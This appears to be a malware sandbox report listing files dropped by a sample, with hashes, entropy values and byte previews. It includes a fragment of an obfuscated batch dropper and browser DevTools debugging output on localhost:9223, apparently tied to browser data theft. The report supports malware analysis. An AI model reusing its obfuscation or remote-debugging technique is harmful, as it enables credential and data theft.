                                                                                                                                                                                                                                                                                                                                    Preview:AzS{.6.tob......U.j.T..Q....*b...B...iyD..(.{.+..S|y....R....Kp^T.DC..mRGtP$SB...k........I=...X.i&...z.r...Z..|L.w.{..L.t..z.....t.9.....;/.`5R.Q.....r...]i.9+F...|.f.../..%.7f..fM.!...|.{L....d4]...d.}7.:[...W..t....:..l.......D`..r.F..!...R6e....B5........_C...1.h9..n..q....Z......O..1.c.x.S..xY.x.....7z.|@....T.|5.v.,.I...&./.p...%...e..=x...7C.k[hkH..|.eG.u..|..y.F...@....AX....d..A...F.....i...{.`....N/*...|...V%.d.K.v.>.d....F.....b...~%>..%..z...%........[..."T.x..#.S.,.R.-.(x.+.&...\....t$0...}.7.\;.!..^...J.V.J.h.Kg66b..M......4.O..7Q..),.q.Z...j.".&.jWW."....O..Q.5....Y.f....8.{....=....S.olo*....h.....f....dz7.;B.Z.(....g..k[c....G.Y5T.6.....7.....x...*...~.. ..$.[...q.L~.....j...v..p.u-.n.b/..`0\..^.;..=&U.O.K.;.=.O8.mY.T.t(l..d..L.g+.....*'.Sd`=.O+.E2#.....E....j.8....l.)..'@....vy..ZlLZ..9..s..}h......p..q9462.......A.!..k..E.j......^.8N.w.....SP3..w...A.;@4..#P.%s6,...M......H..3.<..........k..:....,&.......)$..o6...Q..M.b.-R.T.."
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):64401
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.901933407102558
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:6Zo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:6ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                                                                    MD5:AACE187965695C41EF8B24035BFD75CC
                                                                                                                                                                                                                                                                                                                                    SHA1:567D7420531C7B35E0A460B0BEFC9EA4262BFBB5
                                                                                                                                                                                                                                                                                                                                    SHA-256:EDC6D4AE9361DF1894A9D9F5A9861CD4E9E35FE344EB8263C66CFAEA0734F5B6
                                                                                                                                                                                                                                                                                                                                    SHA-512:38C9B84A5E5B5803350165DC4F7D0582E9811B18AF31E429562C2276536A01D2B833E56A6EA3BB61D8449BE3671FAAA49CDD1E8B187CDDA346B06236C1A193EC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:k..~..I.9.........31...E...G...d....8..\...$....F`<.$..o..4.]=.....E92U......M....x..G{......}..N3..+.g.mNI..k6...@U.P....1 .3..o.}{4..3t.[]M.....6......6].mM.g.....x|...u..5D..t...X........[.........u'.6m'..qx....)...VM..fXY.\......].F.RM9.n+./.....Bu.....I8.....j6~g.H.R..i.."."B*......XL.:......H.rk.|~......{.....-..6..~..F2...x.;..3..DmJ.8].q.-..m...M.P....M......F.n.VW.../....Dv.Q.T,.}=t.|.....?O..{......N...@.f...*...........Q:......G..7.r..b.r~.o.1~O]~?.. {....W..'.......T.....S...m.........H.%..;..|..C.>..vurdW..;.*7g.|n......&..uqpg....!......o.5...=L.C..U..t:..J.w.j...|./*....7..[..V....m..I.1...j.X....i&..7.....3q.....#..X+.h....Z..u.l?~.N.xG.0..eU..2.....0.H..j.....za...g]] ......=.@Y^+.7'.j.&.e...sXk.-HoG...a..'.`.x..h...#.J_:..\.4..+..W.rA.n..rJ....4.z;"....l.....9E..@...L....N.B...u..}..v.....\....@<....N\.Ho.c.3...-ph(..>.4.O...lzs.P......P..."..tSL....v..?.....-U}EU.Ur.nW.....Z.P.C...V..-.=}I........=.@"
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):76800
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997946899641085
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:JlVaXdWB+L7vmYtafisr0S7HptjpcV0bGeot/sOFfq1VisKo9awGOePu1Cd2Dm:ty9Xv3xBS7HpVpGsmKssKo9aoecDm
                                                                                                                                                                                                                                                                                                                                    MD5:5672823394F20CEEC679160C3EE97986
                                                                                                                                                                                                                                                                                                                                    SHA1:B37ED4BF8C2D39DC29E1445DFCEF76F7349B83AE
                                                                                                                                                                                                                                                                                                                                    SHA-256:ECF6A26E46C30D120E9E59EC8304205DCEB0264B850A5D280B583B0D37906E5F
                                                                                                                                                                                                                                                                                                                                    SHA-512:E2D4A5BDF71A84C647E136192B9C76D7F237C2E438B21B1CCA96DF216CE2E80BF29B08647C562C4CD3B059A6DF8A762FA6591D271F0FF0A81F623A9C150886C3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.g.C.-w..e..A.........b.,..5..$.H;......i.RF....I.)p..W....0.B.....F.~../..M....c8...r..8.'.u.L... ..blb{..K..13....).&..W...O..T.V...C........l.h......|x...%.>t..x..O..^....`%....yY...\]-...+X..i...[.....=.p.a.&.l.=...".S..6%..M...pdU.....w...u2....?U.. ....v.....*....E/..E..k.g;l..\..D.3.}Hg...MJ{(..U.}....H]..IRb.uJ.Rq....[.K .>..\....h...z8.g8.....&&>^..1j.=z...!.R...F7V>.q.s .i|..n.l+7#..gv.2.@...By.'.N^.....g*......7...>.3r.}9.&GY..vfdwZ.L.J*..r:..E....U......kL.;YZ:..{"....eB.T.X..5.{...Z...M...(^....t.E..g.9....1.E.KlP. .k.J..C...F...g5Q.%m!....-.I......!_rR.d.........*k...9...F.9....F..|o.w....'g....t.1]&.t3.c..F..... .b..%X......9.....;/.0.z }D.....e.7.J..+...V.T@.%...2spX....j..Y..M...K#.W.5C..=....Z.. ..6%z..L>@`.&.D\.[..X#z..`.4..[...%.Du...)...a........Z..g.....*t...,w`.J<.[....0.<..Y.cJ~x..m.TM./9..KU.....%..7..!..*....b..Bo8U....u...W5....X..y+4P..$cjl..`.Xy....ue`...C".xv1..D.....(.T...b]K$..:..N`;..As.h.f..v....MZ.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):58368
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.009730051465658
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:SbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mew:SbFuz08QuklMBNIimuzaAwusPw
                                                                                                                                                                                                                                                                                                                                    MD5:6232746371CBF2D8556BAF03839ADF71
                                                                                                                                                                                                                                                                                                                                    SHA1:4F128B934B2F326F656759EBA82EBE709024A2DC
                                                                                                                                                                                                                                                                                                                                    SHA-256:FC1FFAE925D7CAA51CFA90D75EE250615997F19DE7392B4DC6D1798F9DA28B86
                                                                                                                                                                                                                                                                                                                                    SHA-512:EB3386EBDD99F013B4A55CC3AB203DEC138FD7A0FE6CE006470E9D9E443EA99AD0BFC1C252288077B3C334E70983D542EBC0388CDD98726EA0CD11383CE841A3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:?'P.....<....+..?f.4.cC=.....@.?qW..n{;=.......?.gC .i8=.......?..X.K.D=.....P.?G;...R"=...7...?.8.3<L=...a...?..rF.K=...^.`.?._.U..N=.......?.;.T..6=..... .?......<....!..?q.W*#.M=...""..?.j...\M=...p#0.?|I7Z#./=....$..?^...aDJ=....&..?..>,'1D=...B'@.?..:.+NB=....(..?.1z..@J=....*..?......3=....+`.?w.U4?..=....,..?D....O=...;...?$.b....=..../p.?g)([|X>=...H1..?.>gV...=....20.?.O.B..O=...*4..?bP..A..<....5..?...e..4=...f7@.?|[{.~*L=....9..?.....E=...t:..?G]....C=...'<P.?.{m.u!K=....=..?..v\..4=....?..?.....n.=...fAp.?.{7.!.O=....B..?......=....D .?.=u. .<=....F..?.i&..-.=...lH..?..o...N=....I0.?IT$7.QN=....K..?...\.0=....M..?0t...I=....OP.?..'...C=...uQ..?..4%@.@=...vS..?*..qw.G=...~U`.?K ..+=....W..?F.Pn;.M=....,. ?.]....K=....-8 ?..I..M=.....h ?.5.m.3=..../. ?.. ...M=....0. ?......I=....1. ?."....I=....2 !?..y.$.=....4P!?._....D=....5.!?]..u.E:=..."6.!?l.#...5=...J7.!?,.....A=...u8."?..!y##.<....98"?..x.y.F=....:h"?bC...D=....;."?u....RF=....=."?2...w}.=...D>."?..@(.6F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):62464
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996930228385904
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:iPQUiWPMV6RUaMJSYhP/XfDi7mEiWGRBM4By1Kp:i4akAuaMtXfD1ErGRS4Bywp
                                                                                                                                                                                                                                                                                                                                    MD5:016A3B26A8C8DA9D9A34DC80D69EC8E1
                                                                                                                                                                                                                                                                                                                                    SHA1:1141AB027AE28888F47B0F23D1EAE29D5D2A99CB
                                                                                                                                                                                                                                                                                                                                    SHA-256:87F2B94E0DDB84944B8BFF3F4CD4941B068F73F4EAA84D95ABE09C2E99F4FA0F
                                                                                                                                                                                                                                                                                                                                    SHA-512:B6FAF11610140C4D947C2B2DBBCDE6D3CDE45F75A75A0BFFDA314D46DFFC3F58E4BE7726ACE1BBF66091B8026E8937F41A9C6987852EED520E0C2BE2BB2FB06C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Q_N.]..H...r.yf.{.5&@.}.<...D.?].(..@.h.j3Tv...O.Sesv...@N..|.y...N.....F....w-.&C.B.@..U..t....`4Du.~...?UjIu.N..O.].../.@...../$.O....B.......y...l.....M....j6.W..x7....T._.4.........". XM.z.5..z..P...E.>.R...3...wq7.tf.*.S..7.}.....3.*".6....[.sf_......<.+.4RY....P..V...v.0................6%B..>\7>.V.q.b.,.C.av....$...\f0.....#..XO7.k..H....$&.Q.L.8...~h/..a.........U.M|.j3.....C..h..r..y.+.:....)S...'><.4.......M...:...+q.fo...y.......u....\^[.V.0v...v..^.....m_.........t.:....O..K.J.g..Z....0.eN...=;...Rk.....pf....bO.B..wX..^..j.x+^G.u...;..E...!v....c....F...EJ.7PFH..... .....6..t..T...39..(m.k..FHI9.~....wh., C..pX.?...l..*,..Q.......5s>.9...c.....Z..M4...W......K3...M....c..(.\.0.P.6.v....'.~.. yr-.f...G.......gC...~E....ybdY.w.._.._<..}G...Z..n.........v;Z...qNY..sC...$l..k..n/.#.s.k....d...k..zWm.M.<....{....M..FP.|,.......Z.7....X.|...b.....Z........].d.Bc..(....s.P...o...4....f].zo.*..!../....Ik..~......t..Q.PtO....&.L.i.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):78848
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.632664333387575
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:TqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBosd0bn:Tj6iTcPAsAhxjgarB/5el3EYrDWyu0T
                                                                                                                                                                                                                                                                                                                                    MD5:FA9441BDEBFC845C4A9418E655604412
                                                                                                                                                                                                                                                                                                                                    SHA1:7F2112D5E0EF1FF3044099769DD8080DAE5BED23
                                                                                                                                                                                                                                                                                                                                    SHA-256:02E0C6AF7D0A62BFA2C9BCEC84A37D545FB41FEAD10BE9712F3A51FDE6EB8DE1
                                                                                                                                                                                                                                                                                                                                    SHA-512:49AAB35ABC5AB7F34EE1AE7F1D22953145F5E389D515D23ADD5FF227AAE47B6D99737BDEEAE379CBC9C222CF3D18CF85D44626DCB7112BFCAA010CDAFF571AC3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:sing brace missing?).missing opening brace after \o.parentheses are too deeply nested.invalid range in character class.group name must start with a non-digit.parentheses are too deeply nested (stack check).digits missing in \x{} or \o{}.regular expression is too complicated........................................*.+.,.-......7.8.9.:......D.E.F.G......Q.R.S.T......^._.`.a......j.k.l.m...........................@...................`........................... ................... ...........@....................................................................... ...............................................................................................................................................\.P.{.N.d.}.....\.P.{.X.p.s.}...\.p.{.X.p.s.}.......................................................................................................................alpha.lower.upper.alnum.ascii.blank.cntrl.digit.graph.print.punct.space.word.xdigit.\.P.{.X.w.d.}...\.p.{.N.d.}................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):60416
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.899310988627953
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:su88888888888888888888888888888zv888888NfU84444QnooooooooooooooW:s/SGKAGW9
                                                                                                                                                                                                                                                                                                                                    MD5:6E5BB40D89B1793A12D156CB39C9AFD0
                                                                                                                                                                                                                                                                                                                                    SHA1:9B815E4DF31C4F168207695D18599116F170D39E
                                                                                                                                                                                                                                                                                                                                    SHA-256:5652C71501C3BBD698FE95DB5213EE14C050A2080AEBEE4A76F534EF95D8817A
                                                                                                                                                                                                                                                                                                                                    SHA-512:FF04D33F672D0A1ADF5DCA6BBB2495CF576502899D4B267792E8D6BDEA6B8B1A2D6823951239689F105351530C084BEDDAA0131F10B868DA85DC605935629BAA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.r.r.r...............................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.......................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (471), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):8937
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.210815190077583
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+3CrXjwTlwTrxPbyaA913d1JAHZADuFYc6DOgmSbbo/m0oyQ:ZTeUrxPbjA913LJAHHmHGq5
                                                                                                                                                                                                                                                                                                                                    MD5:3DBFA80F063079E66F819DA8452E17BB
                                                                                                                                                                                                                                                                                                                                    SHA1:2D546875602A5ED7ED181F0A6D372A0A112052DE
                                                                                                                                                                                                                                                                                                                                    SHA-256:FF670D805EBBD0CCA4F133162C3D67E9EC67CB514FC411DC268ABE28D4F54510
                                                                                                                                                                                                                                                                                                                                    SHA-512:2261F68FB1362B9E088339375F35EA463E090249573B5D60D4C02069E8E45254543097BE4CC28970C91DA807A0D84F97F1EC56DDFEBD87B8B326E9C9F8D68E65
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Set Chapel=V..mfDFist-Motherboard-Textile-See-Tub-Emacs-Solaris-Discipline-Hrs-..BbComing-Chapter-..eqbSacred-Byte-Societies-Feb-Representations-Pine-Objective-Stomach-..iKEmerald-O-Breasts-Penalty-Uk-Selling-Testimonials-Nuke-..XvesChem-Chip-..UznRefresh-Cholesterol-Curious-Resorts-Measurement-Appeared-Disco-Posts-..egzNMonth-Audience-..LjuSpectrum-Situation-Projector-Saves-Acceptance-Luggage-Lets-Inspection-..Set Disturbed=S..GYDFrancis-Talks-Follows-Tribune-Titanium-Filters-Metropolitan-..ZLStarted-Disputes-Bacon-License-..pkVc-Describing-Pipeline-Death-Council-..AYReservations-Theory-River-Too-Functional-Incorrect-Boy-..QsSIowa-Ten-Heated-Something-Slovakia-Sake-..qZkcIncentive-Nude-Humor-Product-..iGxSim-Freeware-Bicycle-Voyeur-..Set Hughes=E..sFaHMove-Ni-Ran-Passes-Shoppers-Providence-Suggested-Beauty-Committees-..NLaChoosing-Often-Dry-Snow-Functionality-Strand-Greene-Johnston-Recently-..sscWTh-Acc-Carroll-Terrorist-Suits-Alias-Mainly-Ruled-Gis-..aWLinda-Guild-Eve-Foam-Barbados-B
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (471), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):8937
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.210815190077583
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+3CrXjwTlwTrxPbyaA913d1JAHZADuFYc6DOgmSbbo/m0oyQ:ZTeUrxPbjA913LJAHHmHGq5
                                                                                                                                                                                                                                                                                                                                    MD5:3DBFA80F063079E66F819DA8452E17BB
                                                                                                                                                                                                                                                                                                                                    SHA1:2D546875602A5ED7ED181F0A6D372A0A112052DE
                                                                                                                                                                                                                                                                                                                                    SHA-256:FF670D805EBBD0CCA4F133162C3D67E9EC67CB514FC411DC268ABE28D4F54510
                                                                                                                                                                                                                                                                                                                                    SHA-512:2261F68FB1362B9E088339375F35EA463E090249573B5D60D4C02069E8E45254543097BE4CC28970C91DA807A0D84F97F1EC56DDFEBD87B8B326E9C9F8D68E65
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Set Chapel=V..mfDFist-Motherboard-Textile-See-Tub-Emacs-Solaris-Discipline-Hrs-..BbComing-Chapter-..eqbSacred-Byte-Societies-Feb-Representations-Pine-Objective-Stomach-..iKEmerald-O-Breasts-Penalty-Uk-Selling-Testimonials-Nuke-..XvesChem-Chip-..UznRefresh-Cholesterol-Curious-Resorts-Measurement-Appeared-Disco-Posts-..egzNMonth-Audience-..LjuSpectrum-Situation-Projector-Saves-Acceptance-Luggage-Lets-Inspection-..Set Disturbed=S..GYDFrancis-Talks-Follows-Tribune-Titanium-Filters-Metropolitan-..ZLStarted-Disputes-Bacon-License-..pkVc-Describing-Pipeline-Death-Council-..AYReservations-Theory-River-Too-Functional-Incorrect-Boy-..QsSIowa-Ten-Heated-Something-Slovakia-Sake-..qZkcIncentive-Nude-Humor-Product-..iGxSim-Freeware-Bicycle-Voyeur-..Set Hughes=E..sFaHMove-Ni-Ran-Passes-Shoppers-Providence-Suggested-Beauty-Committees-..NLaChoosing-Often-Dry-Snow-Functionality-Strand-Greene-Johnston-Recently-..sscWTh-Acc-Carroll-Terrorist-Suits-Alias-Mainly-Ruled-Gis-..aWLinda-Guild-Eve-Foam-Barbados-B
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):110592
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.6773569090624685
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:bu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxl:3cBiqXvpgF4qv+32eOyKODOSpQSAU4Cj
                                                                                                                                                                                                                                                                                                                                    MD5:8917D431E462D04B80BC410C43D831E9
                                                                                                                                                                                                                                                                                                                                    SHA1:4B3EEC52C6EF8DD44AEF017A11E0262BDDC162FD
                                                                                                                                                                                                                                                                                                                                    SHA-256:A4C6BF42C035FDAB31D6EC59ED9ED81D5CB192C4D527EFACA22494415F2BAF3B
                                                                                                                                                                                                                                                                                                                                    SHA-512:1D745B890C3C16C8945E89143A16EE1E470926798AC17EAFE7142C4172DCD4E7F5BC948B707B0EB8B6E7F119D1CE4A071E85C166074015A03D7C99A7F8015781
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:9H.u.xt.v............U..QQ...L.3.E..e...E.Ph..J.j.....I...t#Vh..J..u.....I.....t..u.......I...^.}..t..u.....I..M.3......]..U..E..\.M.].j.j.j..........j.j.j...........U..j.j..u........]..U....L....j Y+.3...3...L.9.\.M...E....u..S...Y.\.M.]..U..j.j..u..l......]..U..A...+...V3....;.....#.t..U.F...I.;.u.^].....U...u..d.M.....]..U..Q...L.3.E.V.........t..u.......I...Y..t.3.@..3..M.3.^.....].j.h..L..3....e..j..Y...Y.e...5..L.....35d.M...u..E.............@....u.j..h...Y.j.h .L......e..j......Y.e...5..L.....35d.M...u..u.. ...Y.d.M..E.................u.j......Y.h.M...U..E...t....t............."......].h.M...]..U..E..M.SV3..W8].t.j-ZCf...p......3..u...BW...w..B0f.....C..t.;].r.;].r..E.3.f.....j"^.0....... 3.f.....f.....f.....f.....;.r.3._^[]..U.....M.3..U.S.].V..E.W8E.t.j-Xf...s.3.@..E......}..u.j..u.RQ.....M...E..]...v...W....0f.....G..u...t.;}.r.;}..}.r..E.3.f......j"^.0........ 3.f.....f.....f.....f.....;.r.3._^[..]..U..M.V..u....j.^.0...
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):86016
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997944775258056
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:JEzN95shG2gxHEE8p8Rus4v9eTqZafFdv86OtKlFLqZEbo+dmbrLTpf4P9ZxnQNV:SV/HEVVstqZa/nMK7PdkXXpA1kv
                                                                                                                                                                                                                                                                                                                                    MD5:BFC2EF690ABD60002324EC2CC3696054
                                                                                                                                                                                                                                                                                                                                    SHA1:B1F644C44B1AAC3D04A8E96675CF5CFA0DF87F3D
                                                                                                                                                                                                                                                                                                                                    SHA-256:19451D2D5981F98EB831F5E6F44102A3321A9C91943477209AD9856FF98A6086
                                                                                                                                                                                                                                                                                                                                    SHA-512:C1A890D7DCE2BA2F5865F89AE0BC5D0B81529094414F199D0F961E5B63514A0706F6E1644C12868FDC254BADA1F01D38831BCF7BEE814F6320A272B7BE959600
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:....c9\.=.~n..z....15.u....=.z[.N....d.....A\...A...F.];.....15.a.<@..._...c.~..w.H...".J..W........6.DL....0.f.Xc/^..>-2.p...mD..f...E.b.......W....H..[U:..`..m.......8O.j....n,;..6T..2"..;...r~\c...h.Jv...~...iH.....I....r..4v....Zn....y.....w......F.m.U\K.Wp.4[.w......@...5J".-.....F}.I...../0.f.>.Vt.3E.sGK"....l..#.}...1....LO#..K..>..s.........9|...v....\S.U....0.........>.}....wV...PX.N..e=..-/...%.......Oa....b..m[.....v....G.'...$+J...}.%...2.X...,..9^.....f...M\!-.O...XE.F.n.;K.$H.........><.>i).........!.....`Pjl.......yP..C......(Gog....._.,..T...f........T.........&....l1....\Qy..Z..i...ij_c.~.a...........<H.zN.3.z.y."...Vtfx"m.{..\...\.G.*.......s.........;..\P.......+..-......,u=.O....4KK..b!.ij.6.Oj..6..j...<.jaTA...9_.(.......%q.r..p:..Jw....|Aj$&..y.K..W...;..`...s.NQ~C~...m.......-._..<...E.'....^...-..;.$.L.Q...J.F...+...Xf..IFn+iug........|.....t..?..?q.)...A.M..0IU.......OZ...%R.`.hl.=.._yQ.-K.....V_.4.E.G..#
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1230
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7441391139123867
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:vOyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+L:2yGS9PvCA433C+sCNC1skNkvQfhSh
                                                                                                                                                                                                                                                                                                                                    MD5:DA8C118191F2DA7DB7F7030696D162BA
                                                                                                                                                                                                                                                                                                                                    SHA1:2C4F7B69F9D0E3B35AAF60DB3DF695B0144A0172
                                                                                                                                                                                                                                                                                                                                    SHA-256:A7C1D8470B20EFFB62FF3292F8C1E904CCF69221891DB23214922E91FD4EC98A
                                                                                                                                                                                                                                                                                                                                    SHA-512:4B04D5C00950BA18880F88E3B39D83A0529407CDA5EF92ABFF741C0062FA4A6BF88B6269CD965147BADA7F77DCA4AC2731440142405596E0EA70C4C6140397E1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:however........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):3500
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.385895182354139
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:6NnCU3HCFNnCUbC9NnCc9CHNnCSOldgECSjNnC8CXNnCXjwDCXTNnCkwCnNnC33J:6N2NoN6NZOlfjNoN7GNFlNA
                                                                                                                                                                                                                                                                                                                                    MD5:3100B34D88B3A710ED84B001743F7023
                                                                                                                                                                                                                                                                                                                                    SHA1:B9B1532B0C2F6E1841CCF0E7EDE8E9D66C9A2019
                                                                                                                                                                                                                                                                                                                                    SHA-256:A963BC5B3AEDBCA5897EB144E96D6751CC8B7282BF5E9D34209BA36377A95EB8
                                                                                                                                                                                                                                                                                                                                    SHA-512:2F35D882276DFA1860E130AF69A5BF8C3A4B8BA691B9843FDBB54E9B054E91E8C3636FFDEBE938A6E65A91368FCEDBC7FF8202FF218BA01DE636C94DCE559FD3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1633AE1CE3E6CB944C6C3D5E8A9EDF1E",.. "id": "1633AE1CE3E6CB944C6C3D5E8A9EDF1E",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1633AE1CE3E6CB944C6C3D5E8A9EDF1E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FA041E4E3C5777D5DB1B27D51B37376C",.. "id": "FA041E4E3C5777D5DB1B27D51B37376C",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FA041E4E3C5777D5DB1B27D51B37376C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.383606655485899
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
